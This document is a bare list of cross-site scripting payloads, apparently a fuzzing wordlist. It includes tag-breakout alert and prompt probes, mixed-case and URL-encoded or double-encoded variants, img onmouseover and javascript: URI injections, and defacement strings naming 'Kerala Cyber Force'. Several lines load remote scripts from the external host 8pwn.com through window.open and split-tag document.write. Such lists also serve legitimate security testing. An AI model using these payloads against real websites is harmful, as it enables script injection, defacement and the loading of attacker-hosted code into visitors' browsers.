"><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
</script><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
"><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
'><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
"></script><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
"><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
'><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
'></script><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
"><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
'><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
</script><script>alert(String.fromCharCode(75,67,70))</script>
"></script><script>alert(String.fromCharCode(75,67,70))</script>
'></script><script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
"><script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
'><script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
?/><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
"><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
'><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
?/><script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
"><script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
'><script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
?/><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
"><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
'><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
?/><script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
"><script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
'><script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
</SCRIPT>?><SCRIPT>prompt(1)</SCRIPT>
"></SCRIPT>?><SCRIPT>prompt(1)</SCRIPT>
'></SCRIPT>?><SCRIPT>prompt(1)</SCRIPT>
</SCRIPT>?><SCRIPT>alert(String.fromCharCode(75,67,70))
"></SCRIPT>?><SCRIPT>alert(String.fromCharCode(75,67,70))
'></SCRIPT>?><SCRIPT>alert(String.fromCharCode(75,67,70))
</SCRIPT>?>?><SCRIPT>prompt(1)</SCRIPT>
"></SCRIPT>?>?><SCRIPT>prompt(1)</SCRIPT>
'></SCRIPT>?>?><SCRIPT>prompt(1)</SCRIPT>
</SCRIPT>?>?><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>
"></SCRIPT>?>?><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>
'></SCRIPT>?>?><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>
%27%3E%3C%73%63%72%69%70%74%3E%4B%43%46%3C%2F%73%63%72%69%70%74%3E
%22%3E%3C%73%63%72%69%70%74%3E%4B%43%46%3C%2F%73%63%72%69%70%74%3E
%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%34%42%25%34%33%25%34%36%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45
%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%34%42%25%34%33%25%34%36%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45
%25%32%35%25%33%32%25%33%32%25%32%35%25%33%33%25%34%35%25%32%35%25%33%33%25%34%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%39%25%32%35%25%33%37%25%33%30%25%32%35%25%33%37%25%33%34%25%32%35%25%33%33%25%34%35%25%32%35%25%33%34%25%34%32%25%32%35%25%33%34%25%33%33%25%32%35%25%33%34%25%33%36%25%32%35%25%33%33%25%34%33%25%32%35%25%33%32%25%34%36%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%39%25%32%35%25%33%37%25%33%30%25%32%35%25%33%37%25%33%34%25%32%35%25%33%33%25%34%35
<h1>X</h1>
"><h1>X</h1>
'><h1>X</h1>
<marquee>Kerala Cyber Force</marquee>
"><marquee>Kerala Cyber Force</marquee>
'><marquee>Kerala Cyber Force</marquee>
<br><br><b><u>X</u></b>
"><br><br><b><u>X</u></b>
'><br><br><b><u>X</u></b>
<script>window.open( "http://8pwn.com/xss_serve_payloads/X.html" )</script>
</ScrIpt><script>window.open( "http://8pwn.com/xss_serve_payloads/X.html" )</script>
"><script>window.open( "http://8pwn.com/xss_serve_payloads/X.html" )</script>
</ScrIpt><script>window.open( "http://8pwn.com/xss_serve_payloads/X.html" )</script>
'><script>window.open( "http://8pwn.com/xss_serve_payloads/X.html" )</script>
</ScrIpt><script>window.open( "http://8pwn.com/xss_serve_payloads/X.html" )</script>
<script>alert%281%29</script>
</ScrIpt><script>alert%281%29</script>
"><script>alert%281%29</script>
</ScrIpt><script>alert%281%29</script>
'><script>alert%281%29</script>
</ScrIpt><script>alert%281%29</script>
<script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
"><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
'><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>/
</ScrIpt><script>alert(1)</script>/
"><script>alert(1)</script>/
</ScrIpt><script>alert(1)</script>/
'><script>alert(1)</script>/
</ScrIpt><script>alert(1)</script>/
<script%20language=vbscript>msgbox%20X</script>
"><script%20language=vbscript>msgbox%20X</script>
'><script%20language=vbscript>msgbox%20X</script>
></title><script>alert(X)</script>'"><marquee><h1>Kerala Cyber Force</h1></marquee>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
"><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
'><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
"><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
'><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
?;!?<SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>=&{}
!?<SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>=&{}
<img src="blah"onmouseover="alert(1);">
"><img src="blah"onmouseover="alert(1);">
'><img src="blah"onmouseover="alert(1);">
<img src="blah>" onmouseover="alert(1);">
"><img src="blah>" onmouseover="alert(1);">
'><img src="blah>" onmouseover="alert(1);">
<IMG SRC="javascript:alert(1);"
"><IMG SRC="javascript:alert(1);"
'><IMG SRC="javascript:alert(1);">
"><IMG SRC="javascript:alert(1);"
"><IMG SRC="javascript:alert(1);"
'><IMG SRC="javascript:alert(1);">
'><IMG SRC="javascript:alert(1);"
"><IMG SRC="javascript:alert(1);"
'><IMG SRC="javascript:alert(1);">
<IMG SRC="javascript:alert(1);"
"><IMG SRC="javascript:alert(1);"
'><IMG SRC="javascript:alert(1);"
<IMG SRC=javascript:alert(1)>
"><IMG SRC=javascript:alert(1)>
'><IMG SRC=javascript:alert(1)>
<IMG SRC=JaVaScRiPt:alert(1)>
"><IMG SRC=JaVaScRiPt:alert(1)>
'><IMG SRC=JaVaScRiPt:alert(1)>
</TITLE><SCRIPT>alert(1);</SCRIPT>
</ScrIpt><SCRIPT>alert(1);</SCRIPT>
"><SCRIPT>alert(1);</SCRIPT>
</ScrIpt><SCRIPT>alert(1);</SCRIPT>
'><SCRIPT>alert(1);</SCRIPT>
</ScrIpt><SCRIPT>alert(1);</SCRIPT>
"></TITLE><SCRIPT>alert(1);</SCRIPT>
</ScrIpt><SCRIPT>alert(1);</SCRIPT>
"><SCRIPT>alert(1);</SCRIPT>
</ScrIpt><SCRIPT>alert(1);</SCRIPT>
'><SCRIPT>alert(1);</SCRIPT>
</ScrIpt><SCRIPT>alert(1);</SCRIPT>
'></TITLE><SCRIPT>alert(1);</SCRIPT>
</ScrIpt><SCRIPT>alert(1);</SCRIPT>
"><SCRIPT>alert(1);</SCRIPT>
</ScrIpt><SCRIPT>alert(1);</SCRIPT>
'><SCRIPT>alert(1);</SCRIPT>
